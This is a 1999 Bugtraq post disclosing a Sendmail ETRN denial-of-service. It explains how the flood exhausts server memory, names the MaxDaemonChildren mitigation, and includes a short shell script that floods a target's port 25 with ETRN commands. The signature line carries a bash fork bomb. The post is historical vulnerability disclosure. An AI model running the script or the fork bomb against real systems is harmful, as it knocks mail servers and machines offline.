Bugtraq mailing list archives
Re: procmail / Sendmail - five bugs
From: lcamtuf () IDS PL (Michal Zalewski)
Date: Wed, 22 Dec 1999 22:22:12 +0100
On Tue, 21 Dec 1999, Rob Jones wrote:
with or without these double-quotes the message is immediately dropped on redhat linux with the message
Oops! Yes, apparently this problem affects all versions of Sendmail, but
only with .cf file left from 8.8.x or previous releases. In fact, obsolete
.cf files are quite common if Sendmail has been updated by administrator -
'from hand' or from binary packages like .rpm - as people has not enough
time and good will to rebuild config files when replacing binary
(especially if there are some extensions/custom .cf settings).
So, another thing. There's nice remote Sendmail ETRN DoS. When ETRN
command is read by Sendmail (it shouldn't be allowed at all, IMHO), it
calls fork(). Parent process generates no output - only child-generated
output is sent, so parent won't be notified on send()/write() failure. If
we drop connection (after sending a lot of ETRNs), parent process will
stuck, doing repeately fork() ... sleep(5), till end of ETRNs read into
input buffer is reached. This allows us to spawn any amount of 'unusable'
sendmail childs, hanging for long period of time - and it can be done
using low network bandwitch and resources. Direct result - all server
memory consumed (causing Linux 2.0 kernels to crash with messages like 'no
memory for sendmail', 'no memory for klogd' etc). Unlike connect()
flooding, this attack is generating low traffic, only one connection at
time, and seems to be deadly harmful, unless something like:
# maximum number of children we allow at one time
O MaxDaemonChildren=15
is defined in sendmail.cf (as far I recall, this option is disabled by
default). The exploit follows (written for it's beautiful name):
-- gurghfrbl.sh --
#!/bin/sh
TARGET=localhost
COUNT=150
SLEEP=1
echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"
while:; do
echo -n "."
(
NIC=0
while [ "$NIC" -lt "$COUNT" ]; do
echo "ETRN x"
done
) | telnet $TARGET 25 &>/dev/null &
sleep $SLEEP
killall -9 telnet &>/dev/null
done
-- EOF --
_______________________________________________________________________
Michal Zalewski [lcamtuf () ids pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
Current thread:
- Announcement: Solaris loadable kernel module backdoor, (continued)
- Announcement: Solaris loadable kernel module backdoor plasmoid (Dec 20)
- Re: Announcement: Solaris loadable kernel module backdoor pedward () WEBCOM COM (Dec 21)
- Re: Announcement: Solaris loadable kernel module backdoor Marc Esipovich (Dec 22)
- Re: Announcement: Solaris loadable kernel module backdoor Steven Alexander (Dec 23)
- Re: Announcement: Solaris loadable kernel module backdoor Rainer Link (Dec 22)
- Re: Announcement: Solaris loadable kernel module backdoor Keith Owens (Dec 22)
- Re: Groupewise Web Interface satherrl () MAILPOINT DSSRG CURTIN EDU AU (Dec 21)
- Norton Email Protection Remote Overflow (Addendum) Matt Conover (Dec 20)
- procmail / Sendmail - five bugs Michal Zalewski (Dec 23)
- Re: procmail / Sendmail - five bugs Rob Jones (Dec 20)
- Re: procmail / Sendmail - five bugs Michal Zalewski (Dec 22)
- FTPPro insecuities The Wall (Dec 27)
- serious Lotus Domino HTTP denial of service Alain Thivillon (Dec 21)
- More details on the WU-FTPD configuration vulnerability. suid (Dec 21)
- Microsoft Security Bulletin (MS99-058) Aleph One (Dec 21)
- Microsoft Security Bulletin (MS99-061) Aleph One (Dec 21)
- More Netscape Passwords Available. Rob Jones (Dec 21)
- UnixWare i2odialogd remote root exploit Brock Tellier (Dec 21)
- IE 5.01 vulnerabilities in external.NavigateAndFind() Georgi Guninski (Dec 22)
- Solaris 2.7 dmispd local/remote problems Brock Tellier (Dec 22)
- Multiple vulnerabilites in glFtpD (current versions) suid (Dec 22)